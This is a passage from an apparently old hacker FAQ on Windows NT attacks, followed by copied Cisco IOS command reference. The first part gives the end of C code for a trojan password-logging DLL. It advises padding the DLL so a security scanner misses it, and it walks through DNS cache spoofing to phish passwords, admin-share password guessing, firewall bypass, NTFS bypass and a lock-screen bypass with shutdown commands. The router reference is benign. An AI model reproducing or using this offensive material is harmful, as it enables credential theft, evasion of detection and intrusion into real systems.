5381 wbuf[len] = 0;
5382 wcstombs(buf1, wbuf, 199);
5383 sprintf(buf, "User = %s : ", buf1);
5384 WriteFile(fh, buf, strlen(buf), &wrote, 0);
5385
5386 memcpy(wbuf, passwd->buff, passwd->len);
5387 len = passwd->len/sizeof(WCHAR);
5388 wbuf[len] = 0;
5389 wcstombs(buf1, wbuf, 199);
5390 sprintf(buf, "Password = %s : ", buf1);
5391 WriteFile(fh, buf, strlen(buf), &wrote, 0);
5392
5393 sprintf(buf, "RID = %x\n", rid);
5394 WriteFile(fh, buf, strlen(buf), &wrote, 0);
5395
5396 return 0L;
5397}
5398------------- cut --------------
5399
5400If you load this on a Primary Domain Controller, you'll get EVERYBODY'S password. You have to
5401reboot the server after placing the trojan in %systenroot%\system32.
5402
5403ISS (www.iss.net) has a security scanner for NT which will detect the trojan DLL, so you may
5404wish to consider adding in extra junk to the above code to make the size of the compiled DLL
5405match what the original was. This will prevent the current shipping version of ISS's NT scanner
5406from picking up the trojan.
5407
5408It should be noted that by default the group Everyone has default permissions of "Change" in
5409%systemroot\system32, so any DLL that is not in use by the system could be replaced with a
5410trojan DLL that does something else.
5411
5412[11.1.3] What about spoofin DNS against NT?
5413
5414By forging UDP packets, NT name server caches can be compromised. If recursion is allowed on
5415the name server, you can do some nasty things. Recursion is when a server receives a name
5416server lookup request for a zone or domain for which is does not serve. This is typical how
5417most setups for DNS are done.
5418
5419So how do we do it? We will use the following example:
5420
5421We are root on ns.nmrc.org, IP 10.10.10.1. We have pirate.nmrc.org with an address of
542210.10.10.2, and bait.nmrc.org with an address of 10.10.10.3. Our mission? Make the users at
5423lame.com access pirate.nmrc.org when they try to access www.lamer.net.
5424
5425Okay, assume automation is at work here to make the attack smoother...
5426
5427- DNS query is sent to ns.lame.com asking for address of bait.nmrc.org.
5428- ns.lame.com asks ns.nmrc.org what the address is.
5429- The request is sniffed, and the query ID number is obtained from the
5430request packet.
5431- DNS query is sent to ns.lame.com asking for the address of www.lamer.net.
5432- Since we know the previous query ID number, chances are the next query
5433ID number will be close to that number.
5434- We send spoofed DNS replies with several different query ID numbers.
5435These replies are spoofed to appear to come from ns.lamer.net, and state
5436that its address is 10.10.10.2.
5437- pirate.nmrc.org is set up to look like www.lamer.net, except maybe it
5438has a notice to "go to the new password page and set up an account and ID".
5439Odds are this new password is used by that lame.com user somewhere else...
5440
5441With a little creativity, you can also do other exciting things like reroute (and make copies of)
5442email, denial of service (tell lame.com that www.lamer.net doesn't exist anymore), and other fun
5443things.
5444
5445Supposedly Service Pack 3 fixes this.
5446
5447[11.1.4] What about default shared folders?
5448
5449The main thing to realize about shares is that there are a few that are invisible. Administrative
5450shares are default accounts that cannot be removed. They have a $ at the end of their name. For
5451example C$ is the administrative share for the C: partition, D$ is the administrative share
5452for the D: partition. WINNT$ is the root directory of the system files.
5453
5454By default since logging is not enabled on failed attempts and the administrator doesn't get
5455locked out from false attempts, you can try and try different passwords for the administrator
5456account. You could also try a dictionary attack Once in, you can get at basically anything.
5457
5458[11.1.5] How do I get around a packet filter-based firewall?
5459
5460If the target NT box is behind a firewall that is doing packet filtering (which is not considered
5461firewalling by many folks) and it does not have SP3 loaded it is possible to send it packets
5462anyway. This involves sending decoy IP packet fragments with specially crafted headers that will
5463be "reused" by the malicious IP packet fragments. This is due to a problem with the way NT's
5464TCP/IP stack handles reassembling fragmented packets. As odd as this sounds, example code
5465exists to prove it works. See the web page at http://www.dataprotect.com/ntfrag for details.
5466
5467How does it bypass the packet filter? Typically packet filtering only drops the fragmented packet
5468with the offset of zero in the header. The example source forges the headers to get around this,
5469and NT happily reassembles what does arrive.
5470
5471[11.1.6] What is NTFS?
5472
5473NTFS is the Windows NT special file system. This file system is tightly integrated into Windows
5474security -- it is what allows access levels to be set from the directory down to individual files within
5475a directory.
5476
5477[11.1.7] Are there are vulnerabilities to NTFS and access controls?
5478
5479Not so much vulnerabilities as there are quirks -- quirks that can be exploited to a certain degree.
5480
5481For example, let's say the system admin has built a home directory for you on the server, but has
5482disallowed the construction of directories or files that you wish to make available to the group
5483Everyone. You are wanting to make this special directory so that you can easily retrieve some
5484hack tools but you are cut off. However, if the sys admin left you as the owner of the home
5485directory, you can go in and alter its permissions. This is because as long as you are the owner or
5486Administrator you still control the file. Oh sure, you may get a few complaints from the system
5487when you are doing it, but it can be done.
5488
5489Since NTFS has security integrated into it, there are not too many ways around it. The main one
5490requires access to the physical system. Boot up the system on a DOS diskette, and use
5491NTFSDOS.EXE. It will allow you to access an NTFS volume bypassing security.
5492
5493The last quirk is that if you have a directory with Full Control instead of RWXDPO permissions,
5494then you get a hidden permission called File Delete Child. FDC cannot be removed. This means
5495that all members of the group Everyone can delete any read-only file in the directory. Depending
5496on what the directory contains, a hacker can replace a file with a trojan.
5497
5498[11.1.8] How is file and directory security enforced?
5499
5500Since files and directories are considered objects (same as services), the security is managed at
5501an "object" level.
5502
5503An access-control list (ACL) contains information that controls access to an object or controls
5504auditing of attempts to access an object. It begins with a header contains information pertaining to
5505the entire ACL, including the revision level, the size of the ACL, and the number of access-control
5506entries (ACEs) in the list.
5507
5508After the header is a list of ACEs. Each ACE specifies a trustee, a set of access rights, and flags
5509that dictate whether the access rights are allowed, denied, or audited for the trustee. A trustee
5510can be a user account, group account, or a logon account for a service program.
5511
5512A security descriptor can contain two types of ACLs: a discretionary ACL (DACL) and a system
5513ACL (SACL).
5514
5515In a DACL, each ACE specifies the types of access that are allowed or denied for a specified
5516trustee. An object's owner controls the information in the object's DACL. For example, the owner
5517of a file can use a DACL to control which users can have access to the file, and which users are
5518denied access.
5519
5520If the security descriptor for an object does not have a DACL, the object is not protected and the
5521system allows all attempts to access the object. However, if an object has a DACL that contains
5522no ACEs, the DACL does not grant any access rights. In this case, the system denies all attempts
5523to access the object.
5524
5525In a SACL, each ACE specifies the types of access attempts by a specified trustee that cause the
5526system to generate audit records in the system event log. A system administrator controls the
5527information in the object's SACL. An ACE in a SACL can generate audit records when an access
5528attempt fails, when it succeeds, or both.
5529
5530To keep track of the individual object, a Security Identifier (SID) uniquely identify a user or a
5531group.
5532
5533A SID contains:
5534
5535 - User and group security descriptors
5536 - 48-bit ID authority
5537 - Revision level
5538 - Variable subauthority values
5539
5540A privilege is used to control access to a service or object more strictly than is normal with
5541discretionary access control. Privileges provide access to services rarely needed by most users.
5542For example, one type of privilege might give access for backups and restorals, another might
5543allow the system time to be changed.
5544
5545[11.1.9] Once in, how can I do all that GUI stuff?
5546
5547The main problem is adjusting NT file security attributes. Some utilities are available with NT that
5548can be used, but I'd recommend using the NT Command Line Security Utilities. They include:
5549
5550saveacl.exe - saves file, directory and ownership permissions to a file
5551restacl.exe - restores file permissions and ownership from a saveacl file
5552listacl.exe - lists file permissions in human readable format
5553swapacl.exe - swaps permissions from one user or group to another
5554grant.exe - grants permissions to users/groups on files
5555revoke.exe - revokes permissions to users/groups on files
5556igrant.exe - grants permisssions to users/groups on directories
5557irevoke.exe - revokes permissions to users/groups on directories
5558setowner.exe - sets the ownership of files and directories
5559nu.exe - 'net use' replacement, shows the drives you're connected to
5560
5561The latest version can be found at:
5562
5563ftp://ftp.netcom.com/pub/wo/woodardk/">ftp://ftp.netcom.com/pub/wo/woodardk/
5564
5565[11.2.0] How do I bypass the screen saver?
5566
5567If a user has locked their local workstation using CTRL+ALT+DEL, and you can log in as an
5568administrator, you will have a window of a few seconds where you will see the user's desktop,
5569and even manipulate things. This trick works on NT 3.5 and 3.51, unless the latest service pack
5570has been loaded.
5571
5572If the service pack has been loaded, but it's still 3.X, try the following.
5573
5574 - From another NT workstation, type the following command:
5575
5576 shutdown \\<target_computer> /t:30
5577
5578 - This will start a 30 second shutdown on the target and a Security
5579 window will pop up.
5580
5581 - Cancel the shutdown with the following command:
5582
5583 shutdown \\<target_computer> /a
5584
5585 - The screen saver will kick back in.
5586
5587 - Wiggle the mouse on the target. The screen will go blank.
5588
5589 - Now do a ctrl-alt-del on the target.
5590
5591 - An NT Security window will appear. Select cancel.
5592
5593 - You are now at the Program Manager.
5594
5595[11.2.1] How can tell if its an NT box?
5596
5597Hopefully it is a web server, and they've simply stated proudly "we're running NT", but don't
5598expect that...
5599
5600Port scanning will find some. Typically you'll see port 135 open. This is no guarantee it's not
5601Windows 95, however. Using Samba you should be able to connect and query for the existence
5602of HKEY_LOCAL_MACHINE\Software\Microsoft\WindowsNT and then check
5603\CurrentVersion\CurrentVersion to determine the version running. If guest is enabled, try this first
5604as Everyone has read permissions here by default.
5605
5606Port 137 is used for running NetBios over IP, and since in the Windows world NetBios is used,
5607certainly you can expect port 137 to be open if IP is anywhere in use around NT.
5608
5609Another possible indication is checking for port 139. This tells you your target is advertising an
5610SMB resource to share info, but it could be any number of things, such as a Windows 95 machine
5611or even Windows for Workgroups. These may not be entirely out of the question as potential
5612targets, but if you are after NT you will have to use a combination of the aforementioned
5613techniques coupled with some common sense.
5614
5615To simplify this entire process, Secure Networks Inc. has a freeware utility called NetBios
5616Auditing Tool. This tool's intent is to test NetBios file sharing configurations and passwords on
5617remote systems.
5618
5619[11.2.2] What exactly does the NetBios Auditing Tool do?
5620
5621Developed by Secure Networks Inc., it comes in pre-compiled Win32 binary form as well as the
5622complete source code. It is the "SATAN" of NetBios based systems.
5623
5624Here is a quote from Secure Networks Inc about the product -
5625
5626"The NetBIOS Auditing Tool (NAT) is designed to explore the NETBIOS file-sharing services
5627offered by the target system. It implements a stepwise approach to gather information and
5628attempt to obtain file system-level access as though it were a legitimate local client.
5629
5630The major steps are as follows:
5631
5632A UDP status query is sent to the target, which usually elicits a reply containing the Netbios
5633"computer name". This is needed to establish a session. The reply also can contain other
5634information such as the workgroup and account names of the machine's users. This part of the
5635program needs root privilege to listen for replies on UDP port 137, since the reply is usually sent
5636back to UDP port 137 even if the original query came from some different port.
5637
5638TCP connections are made to the target's Netbios port [139], and session requests using the
5639derived computer name are sent across. Various guesses at the computer name are also used, in
5640case the status query failed or returned incomplete information. If all such attempts to establish a
5641session fail, the host is assumed invulnerable to NETBIOS attacks even if TCP port 139 was
5642reachable.
5643
5644Provided a connection is established Netbios "protocol levels" are now negotiated across the new
5645connection. This establishes various modes and capabilities the client and server can use with
5646each other, such as password encryption and if the server uses user-level or share-level Security.
5647The usable protocol level is deliberately limited to LANMAN version 2 in this case, since that
5648protocol is somewhat simpler and uses a smaller password keyspace than NT.
5649
5650If the server requires further session setup to establish credentials, various defaults are
5651attempted. Completely blank usernames and passwords are often allowed to set up "guest"
5652connections to a server; if this fails then guesses are tried using fairly standard account names
5653such as ADMINISTRATOR, and some of the names returned from the status query. Extensive
5654username/password checking is NOT done at this point, since the aim is just to get the session
5655established, but it should be noted that if this phase is reached at all MANY more guesses can be
5656attempted and likely without the owner of the target being immediately aware of it.
5657
5658Once the session is fully set up, transactions are performed to collect more information about the
5659server including any file system "shares" it offers.
5660
5661Attempts are then made to connect to all listed file system shares and some potentially unlisted
5662ones. If the server requires passwords for the shares, defaults are attempted as described above
5663for session setup. Any successful connections are then explored for writeability and some well-
5664known file-naming problems [the ".." class of bugs].
5665
5666If a NETBIOS session can be established at all via TCP port 139, the target is declared
5667"vulnerable" with the remaining question being to what extent. Information is collected under the
5668appropriate vulnerability at most of these steps, since any point along the way be blocked by the
5669Security configurations of the target. Most Microsoft-OS based servers and Unix SAMBA will
5670yield computer names and share lists, but not allow actual file-sharing connections without
5671a valid username and/or password. A remote connection to a share is therefore a possibly
5672serious Security problem, and a connection that allows WRITING to the share almost certainly so.
5673Printer and other "device" services offered by the server are currently ignored."
5674
5675If you need more info on NAT, try looking at this web location:
5676
5677 http://www.secnet.com/ntinfo/ntaudit.html
5678 http://www.rhino9.org
5679
5680[12.0.0] Cisco Routers and their configuration
5681
5682Many many hackers and security professionals alike take routers for granted. Well, I have a news
5683flash for you, if your routers go down, so does your network. We have included this section to
5684attempt to educate system administrators on configuring cisco routers. Keep in mind that cisco is
5685to date, the most widely used and common router. And for good reason, it’s a damn good router.
5686Kudos to Cisco for making an excellent product. (NOTE: The rhino9 team did not sell, or make a
5687profit off of this publication in any way, shape or form.) The information below was retrieved from
5688the Cisco website (www.cisco.com). Copyright 1988-1997 © Cisco Systems Inc.
5689
5690Many times, routers will not have passwords configured (this is mainly due to ignorant
5691administrators… HEY.. Hire someone that knows what theyre doing… like a security professional
5692or a Cisco Engineer…. Geeesh.)
5693
5694
5695[12.0.1] User Interface Commands
5696This chapter describes the commands used to enter and exit the various Cisco Internetwork
5697Operating System (Cisco IOS) configuration command modes. It provides a description of the
5698help command and help features, lists the command editing keys and functions, and details the
5699command history feature.
5700You can abbreviate the syntax of Cisco IOS configuration commands. The software recognizes a
5701command when you enter enough characters of the command to uniquely identify it.
5702For user interface task information and examples, see the "Understanding the User Interface"
5703chapter of the Configuration Fundamentals Configuration Guide.
5704
5705[12.0.2] disable
5706To exit privileged EXEC mode and return to user EXEC mode, enter the disable EXEC
5707command.
5708disable [level]
5709Syntax Description
5710level (Optional) Specifies the user-privilege level.
5711
5712Note The disable command is associated with privilege level 0. If you configure AAA
5713authorization for a privilege level greater than 0, this command will not be included in the
5714command set for that privilege level.
5715
5716Command Mode
5717EXEC
5718Usage Guidelines
5719This command first appeared in Cisco IOS Release 10.0.
5720Use this command with the level option to reduce the user-privilege level. If a level is not
5721specified, it defaults to the user EXEC mode, which is level 1.
5722Example
5723In the following example, entering the disable command causes the system to exit privileged
5724EXEC mode and return to user EXEC mode as indicated by the angle bracket (>):
5725Router# disable
5726Router>
5727Related Command
5728enable
5729
5730[12.0.3] editing
5731To enable enhanced editing mode for a particular line, use the editing line configuration
5732command. To disable the enhanced editing mode, use the no form of this command.
5733editing
5734no editing
5735Syntax Description
5736This command has no arguments or keywords.
5737Default
5738Enabled
5739Command Mode
5740Line configuration
5741Usage Guidelines
5742This command first appeared in Cisco IOS Release 10.0.
5743
5744Keys Function
5745Tab Completes a partial command name entry. When you enter a unique set of characters
5746and press the Tab key, the system completes the command name. If you enter a set of
5747characters that could indicate more than one command, the system beeps to indicate an error.
5748Enter a question mark (?) immediately following the partial command (no space). The system
5749provides a list of commands that begin with that string.
5750Delete or Backspace Erases the character to the left of the cursor.
5751Return At the command line, pressing the Return key performs the function of processing a
5752command. At the "---More---" prompt on a terminal screen, pressing the Return key scrolls down
5753a line.
5754Space Bar Allows you to see more output on the terminal screen. Press the space bar when
5755you see the line "---More---" on the screen to display the next screen.
5756Left Arrow Moves the cursor one character to the left. When you enter a command that
5757extends beyond a single line, you can press the Left Arrow key repeatedly to scroll back toward
5758the system prompt and verify the beginning of the command entry.
5759Right Arrow1 Moves the cursor one character to the right.
5760Up Arrow1 or Ctrl-P Recalls commands in the history buffer, beginning with the most recent
5761command. Repeat the key sequence to recall successively older commands.
5762Down Arrow1 or
5763Ctrl-N Return to more recent commands in the history buffer after recalling commands with the
5764Up Arrow or Ctrl-P. Repeat the key sequence to recall successively more recent commands.
5765Ctrl-A Moves the cursor to the beginning of the line.
5766Ctrl-B Moves the cursor back one character.
5767Ctrl-D Deletes the character at the cursor.
5768Ctrl-E Moves the cursor to the end of the command line.
5769Ctrl-F Moves the cursor forward one character.
5770Ctrl-K Deletes all characters from the cursor to the end of the command line.
5771Ctrl-L and Ctrl-R Redisplays the system prompt and command line.
5772Ctrl-T Transposes the character to the left of the cursor with the character located at the cursor.
5773
5774Ctrl-U and Ctrl-X Deletes all characters from the cursor back to the beginning of the
5775command line.
5776Ctrl-V and Esc Q Inserts a code to indicate to the system that the keystroke immediately
5777following should be treated as a command entry, not as an editing key.
5778Ctrl-W Deletes the word to the left of the cursor.
5779Ctrl-Y Recalls the most recent entry in the delete buffer. The delete buffer contains the last ten
5780items you have deleted or cut. Ctrl-Y can be used in conjunction with Esc Y.
5781Ctrl-Z Ends configuration mode and returns you to the EXEC prompt.
5782Esc B Moves the cursor back one word.
5783Esc C Capitalizes the word from the cursor to the end of the word.
5784Esc D Deletes from the cursor to the end of the word.
5785Esc F Moves the cursor forward one word.
5786Esc L Changes the word to lowercase at the cursor to the end of the word.
5787Esc U Capitalizes from the cursor to the end of the word.
5788Esc Y Recalls the next buffer entry. The buffer contains the last ten items you have deleted.
5789Press Ctrl-Y first to recall the most recent entry. Then press Esc Y up to nine times to recall the
5790remaining entries in the buffer. If you bypass an entry, continue to press Esc Y to cycle back to it.
5791
5792 The arrow keys function only with ANSI-compatible terminals.
5793
5794Key Function
5795Delete or Backspace Erases the character to the left of the cursor.
5796Ctrl-W Erases a word.
5797Ctrl-U Erases a line.
5798Ctrl-R Redisplays a line.
5799Ctrl-Z Ends configuration mode and returns to the EXEC prompt.
5800Return Executes single-line commands.
5801Example
5802In the following example, enhanced editing mode is disabled on line 3:
5803line 3
5804no editing
5805Related Command
5806A dagger (†) indicates that the command is documented outside this chapter.
5807terminal editing â€
5808
5809
5810[12.0.4] enable
5811To enter privileged EXEC mode, use the enable EXEC command.
5812enable [level]
5813Syntax Description
5814level (Optional) Privileged level on which to log in.
5815
5816Note The enable command is associated with privilege level 0. If you configure AAA
5817authorization for a privilege level greater than 0, this command will not be included in the
5818command set for that privilege level.
5819
5820Command Mode
5821EXEC
5822Usage Guidelines
5823This command first appeared in Cisco IOS Release 10.0.
5824Because many of the privileged commands set operating parameters, privileged access should
5825be password-protected to prevent unauthorized use. If the system administrator has set a
5826password with the enable password global configuration command, you are prompted to enter it
5827before being allowed access to privileged EXEC mode. The password is case sensitive.
5828If an enable password has not been set, enable mode only can be accessed from the router
5829console. If a level is not specified, it defaults to the privileged EXEC mode, which is level 15.
5830Example
5831In the following example, the user enters the enable command and is prompted to enter a
5832password. The password is not displayed on the screen. After the user enters the correct
5833password, the system enters privileged command mode as indicated by the pound sign (#).
5834Router> enable
5835Password:
5836Router#
5837Related Commands
5838A dagger (†) indicates that the command is documented outside this chapter.
5839disable
5840enable password â€
5841
5842
5843[12.0.5] end
5844To exit configuration mode, or any of the configuration submodes, use the end global
5845configuration command.
5846end
5847Syntax Description
5848This command has no arguments or keywords.
5849Command Mode
5850Global configuration
5851Usage Guidelines
5852This command first appeared in Cisco IOS Release 10.0.
5853You can also press Ctrl-Z to exit configuration mode.
5854Example
5855In the following example, the name is changed to george using the hostname global
5856configuration command. Entering the end command causes the system to exit configuration
5857mode and return to EXEC mode.
5858Router(config)# hostname george
5859george(config)# end
5860george#
5861Related Command
5862A dagger (†) indicates that the command is documented outside this chapter.
5863hostname â€
5864
5865
5866[12.0.6] exit
5867To exit any configuration mode or close an active terminal session and terminate the EXEC, use
5868the exit command at the system prompt.
5869exit
5870Syntax Description
5871This command has no arguments or keywords.
5872Command Mode
5873Available in all command modes.
5874Usage Guidelines
5875This command first appeared in Cisco IOS Release 10.0.
5876Use the exit command at the EXEC levels to exit the EXEC mode. Use the exit command at the
5877configuration level to return to privileged EXEC mode. Use the exit command in interface, line,
5878router, IPX-router, and route-map command modes to return to global configuration mode. Use
5879the exit command in subinterface configuration mode to return to interface configuration mode.
5880You also can press Ctrl-Z, or use the end command, from any configuration mode to return to
5881privileged EXEC mode.
5882
5883Note The exit command is associated with privilege level 0. If you configure AAA authorization
5884for a privilege level greater than 0, this command will not be included in the command set for that
5885privilege level.
5886
5887Examples
5888In the following example, the user exits subinterface configuration mode to return to interface
5889configuration mode:
5890Router(config-subif)# exit
5891Router(config-if)#
5892The following example shows how to exit an active session.
5893Router> exit
5894Related Commands
5895A dagger (†) indicates that the command is documented outside this chapter.
5896disconnect â€
5897end
5898logout â€
5899
5900
5901[12.0.7] full-help
5902To get help for the full set of user-level commands, use the full-help command.
5903full-help
5904Syntax Description
5905This command has no arguments or keywords.
5906Default
5907Disabled
5908Command Mode
5909Available in all command modes.
5910Usage Guidelines
5911This command first appeared in Cisco IOS Release 10.0.
5912The full-help command enables (or disables) an unprivileged user to see all of the help
5913messages available. It is used with the show? command.
5914Example
5915The following example is output for show? with full-help disabled:
5916Router> show ?
5917clock Display the system clock
5918history Display the session command history
5919hosts IP domain-name, lookup style, nameservers, and host table
5920sessions Information about Telnet connections
5921terminal Display terminal configuration parameters
5922users Display information about terminal lines
5923version System hardware and software status
5924Related Command
5925help
5926
5927[12.0.8] help
5928To display a brief description of the help system, enter the help command.
5929help
5930Syntax Description
5931This command has no arguments or keywords.
5932Command Mode
5933Available in all command modes.
5934Usage Guidelines
5935This command first appeared in Cisco IOS Release 10.0.
5936The help command provides a brief description of the context-sensitive help system.
5937? To list all commands available for a particular command mode, enter a question mark (?)
5938at the system prompt.
5939?
5940? To obtain a list of commands that begin with a particular character string, enter the
5941abbreviated command entry immediately followed by a question mark (?). This form of
5942help is called word help, because it lists only the keywords or arguments that begin with
5943the abbreviation you entered.
5944?
5945? To list a command's associated keywords or arguments, enter a question mark (?) in
5946place of a keyword or argument on the command line. This form of help is called
5947command syntax help, because it lists the keywords or arguments that apply based on
5948the command, keywords, and arguments you have already entered.
5949
5950Note The help command is associated with privilege level 0. If you configure AAA authorization
5951for a privilege level greater than 0, this command will not be included in the command set for that
5952privilege level.
5953
5954Examples
5955Enter the help command for a brief description of the help system:
5956Router# help
5957Help may be requested at any point in a command by entering
5958a question mark '?'. If nothing matches, the help list will
5959be empty and you must backup until entering a '?' shows the
5960available options.
5961Two styles of help are provided:
59621. Full help is available when you are ready to enter a
5963 command argument (e.g. 'show ?') and describes each possible
5964 argument.
59652. Partial help is provided when an abbreviated argument is entered
5966 and you want to know what arguments match the input
5967 (e.g. 'show pr?'.)
5968The following example shows how to use word help to display all the privileged EXEC commands
5969that begin with the letters "co":
5970
5971Router# co?
5972configure connect copy
5973
5974The following example shows how to use command syntax help to display the next argument of a
5975partially complete access-list command. One option is to add a wildcard mask. The <cr> symbol
5976indicates that the other option is to press Return to execute the command.
5977Router(config)# access-list 99 deny 131.108.134.234 ?
5978 A.B.C.D Mask of bits to ignore
5979<cr>
5980Related Command
5981full-help
5982
5983[12.0.9] history
5984To enable the command history function, or to change the command history buffer size for a
5985particular line, use the history line configuration command. To disable the command history
5986feature, use the no form of this command.
5987history [size number-of-lines]
5988no history [size number-of-lines]
5989Syntax Description
5990size number-of-lines (Optional) Specifies the number of command lines that the system will
5991record in its history buffer. The range is 0 to 256.
5992Default
599310 lines
5994Command Mode
5995Line configuration
5996Usage Guidelines
5997This command first appeared in Cisco IOS Release 10.0.
5998The history command without the size keyword and the number-of-lines argument enables the
5999history function with the last buffer size specified or with the default of 10 lines, if there was not a
6000prior setting.
6001The no history command without the size keyword and the number-of lines argument disables
6002the history feature but remembers the buffer size if it was something other than the default. The
6003no history size command resets the buffer size to 10.
6004
6005Note The history size command only sets the size of the buffer; it does not reenable the history
6006feature. If the no history command is used, the history command must be used to reenable this
6007feature.
6008
6009The command history feature provides a record of EXEC commands that you have entered. This
6010feature is particularly useful for recalling long or complex commands or entries, including access
6011lists.
6012
6013Key Functions
6014Ctrl-P or Up Arrow Recalls commands in the history buffer in a backward sequence, beginning
6015with the most recent command. Repeat the key sequence to recall successively older commands.
6016
6017Ctrl-N or Down Arrow1 Returns to more recent commands in the history buffer after recalling
6018commands with Ctrl-P or the Up Arrow. Repeat the key sequence to recall successively more
6019recent commands.
6020
60211 The arrow keys function only with ANSI-compatible terminals such as VT100s.
6022Example
6023In the following example, line 4 is configured with a history buffer size of 35 lines:
6024line 4
6025history size 35
6026Related Commands
6027A dagger (†) indicates that the command is documented outside this chapter.
6028show history
6029terminal history size â€
6030
6031
6032[12.1.0] ip http access-class
6033To assign an access-list to the http server used by the Cisco IOS ClickStart software or the Cisco
6034Web browser interface, use the ip http access-class global configuration command. To remove
6035the assigned access list, use the no form of this command.
6036ip http access-class {access-list-number | name}
6037no ip http access-class {access-list-number | name}
6038Syntax Description
6039access-list-number Standard IP access list number in the range 0 to 99, as configured by the
6040access-list (standard) command.
6041name Name of a standard IP access list, as configured by the ip access-list command.
6042Default
6043There is no access list applied to the http server.
6044Command Mode
6045Global configuration
6046Usage Guidelines
6047This command first appeared in Cisco IOS Release 11.2.
6048If this command is configured, the specified access list is assigned to the http server. Before the
6049http server accepts a connection, it checks the access list. If the check fails, the http server does
6050not accept the request for a connection.
6051Example
6052The following command assigns the access list named marketing to the http server:
6053ip http access-class marketing
6054ip access-list standard marketing
6055 permit 192.5.34.0 0.0.0.255
6056 permit 128.88.0.0 0.0.255.255
6057 permit 36.0.0.0 0.255.255.255
6058! (Note: all other access implicitly denied)
6059Related Commands
6060A dagger (†) indicates that the command is documented outside this chapter.
6061ip access-list â€
6062ip http server
6063
6064[12.1.1] ip http port
6065To specify the port to be used by the Cisco IOS ClickStart software or the Cisco Web browser
6066interface, use the ip http port global configuration command. To use the default port, use the no
6067form of this command.
6068ip http port number
6069no ip http port
6070Syntax Description
6071number Port number for use by ClickStart or the Cisco Web browser interface. The
6072default is 80.
6073Default
607480
6075Command Mode
6076Global configuration
6077Usage Guidelines
6078This command first appeared in Cisco IOS Release 11.2.
6079Use this command if ClickStart or the Cisco Web browser interface cannot use port 80.
6080Example
6081The following command configures the router so that you can use ClickStart or the Cisco Web
6082browser interface via port 60:
6083ip http server
6084ip http port 60
6085Related Command
6086ip http server
6087
6088[12.1.2] ip http server
6089To enable a Cisco 1003, Cisco 1004, or Cisco 1005 router to be configured from a browser using
6090the Cisco IOS ClickStart software, and to enable any router to be monitored or have its
6091configuration modified from a browser using the Cisco Web browser interface, use the ip http
6092server global configuration command. To disable this feature, use the no form of this command.
6093ip http server
6094no ip http server
6095Syntax Description
6096This command has no arguments or keywords.
6097Default
6098This feature is enabled on Cisco 1003, Cisco 1004, and Cisco 1005 routers that have not yet
6099been configured. For Cisco 1003, Cisco 1004, and Cisco 1005 routers that have already been
6100configured, and for all other routers, this feature is disabled.
6101Command Mode
6102Global configuration
6103Usage Guidelines
6104This command first appeared in Cisco IOS Release 11.2.
6105Example
6106The following command configures the router so that you can use the Cisco Web browser
6107interface to issue commands to it:
6108ip http server
6109Related Commands
6110ip http access-class
6111ip http port
6112
6113[12.1.3] menu (EXEC)
6114Use the menu EXEC command to invoke a user menu.
6115menu name
6116Syntax Description
6117name The configuration name of the menu.
6118Command Mode
6119User EXEC mode or privileged EXEC mode
6120Usage Guidelines
6121This command first appeared in Cisco IOS Release 10.0.
6122A menu can be invoked at either the user or privileged EXEC level, but if an item in the menu
6123contains a privileged EXEC command, the user must be logged in at the privileged level for the
6124command to succeed.
6125Example
6126The following example shows how to invoke the menu named Access1:
6127menu Access1
6128
6129[12.1.4] menu (global)
6130Use the menu global configuration command with the appropriate keyword to specify menu-
6131display options. Use the no form of the global configuration command to delete a specified, or
6132named, menu from the configuration.
6133menu name [clear-screen | line-mode | single-space | status-line]
6134no menu name
6135Syntax Description
6136name The configuration name of the menu.
6137clear-screen (Optional) Clears the terminal screen before displaying a menu.
6138line-mode (Optional) In a menu of nine or fewer items, you ordinarily select a menu item by
6139entering the item number. In line mode, you select a menu entry by entering the item number and
6140pressing Return. Line mode allows you to backspace over the selected number and enter another
6141number before pressing Return to execute the command. This option is activated automatically
6142when more than nine menu items are defined but also can be configured explicitly for menus of
6143nine or fewer items.
6144single-space (Optional) Displays menu items single-spaced rather than double-spaced. This
6145option is activated automatically when more than nine menu items are defined but also can be
6146configured explicitly for menus of nine or fewer items.
6147status-line (Optional) Displays a line of status information about the current user.
6148Command Mode
6149Global configuration
6150Usage Guidelines
6151This command first appeared in Cisco IOS Release 10.0.
6152The clear-screen option uses a terminal-independent mechanism based on termcap entries
6153defined in the router and the terminal type configured for the user's terminal. The clear-screen
6154option allows the same menu to be used on multiple types of terminals instead of having terminal-
6155specific strings embedded within menu titles. If the termcap entry does not contain a clear string,
6156the menu system enters 24 newlines, causing all existing text to scroll off the top of the terminal
6157screen.
6158The status-line option displays the status information at the top of the screen before the menu
6159title is displayed. This status line includes the router's host name, the user's line number, and the
6160current terminal type and keymap type (if any).
6161A menu can be activated at the user EXEC level or at the privileged EXEC level, depending upon
6162whether the given menu contains menu entries using privileged commands.
6163When a particular line should always display a menu, that line can be configured with an
6164autocommand configuration command. The menu should not contain any exit paths that leave
6165users in an unfamiliar interface environment.
6166Menus can be run on a per-user basis by defining a similar autocommand for that local
6167username.
6168Examples
6169The following example shows how to invoke the menu named Access1:
6170menu Access1
6171The following example shows how to display the status information using the status-line option
6172for the menu named Access1:
6173menu Access1 status-line
6174Related Commands
6175A dagger (†) indicates that the command is documented outside this chapter.
6176menu command â€
6177menu text
6178menu title
6179resume â€
6180
6181
6182[12.1.5] menu command
6183Use the menu command global configuration command to specify underlying commands for
6184user interface menus.
6185menu name command number
6186Syntax Description
6187name The configuration name of the menu. You can specify a maximum of 20 characters.
6188number The selection number associated with the menu entry. This number is displayed
6189to the left of the menu entry. You can specify a maximum of 18 menu entries. When the tenth
6190item is added to the menu, the line-mode and single-space options are activated automatically.
6191Command Mode
6192Global configuration
6193Usage Guidelines
6194This command first appeared in Cisco IOS Release 10.0.
6195The menu command and menu text commands define a menu entry. These commands must
6196use the same menu name and menu selection number.
6197The menu command has a special option, menu-exit, that is available only within menus. It is
6198used to exit a submenu and return to the previous menu level or exit the menu altogether and
6199return to the EXEC command prompt.
6200You can create submenus that are opened by selecting a higher-level menu entry. Use the menu
6201command to invoke a menu as the command in a line specifying a higher-level menu entry.
6202
6203Note If you nest too many levels of menus, the system prints an error message on the terminal
6204and returns to the previous menu level.
6205
6206When a menu allows connections (their normal use), the command for an entry activating the
6207connection should contain a resume command, or the line should be configured to prevent users
6208from escaping their sessions with the escape-char none command. Otherwise, when they
6209escape from a connection and return to the menu, there will be no way to resume the session and
6210it will sit idle until the user logs off.
6211Specifying the resume command as the action that is performed for a selected menu entry
6212permits a user to resume a named connection or connect using the specified name, if there is no
6213active connection by that name. As an option, you can also supply the connect string needed to
6214connect initially. When you do not supply this connect string, the command uses the specified
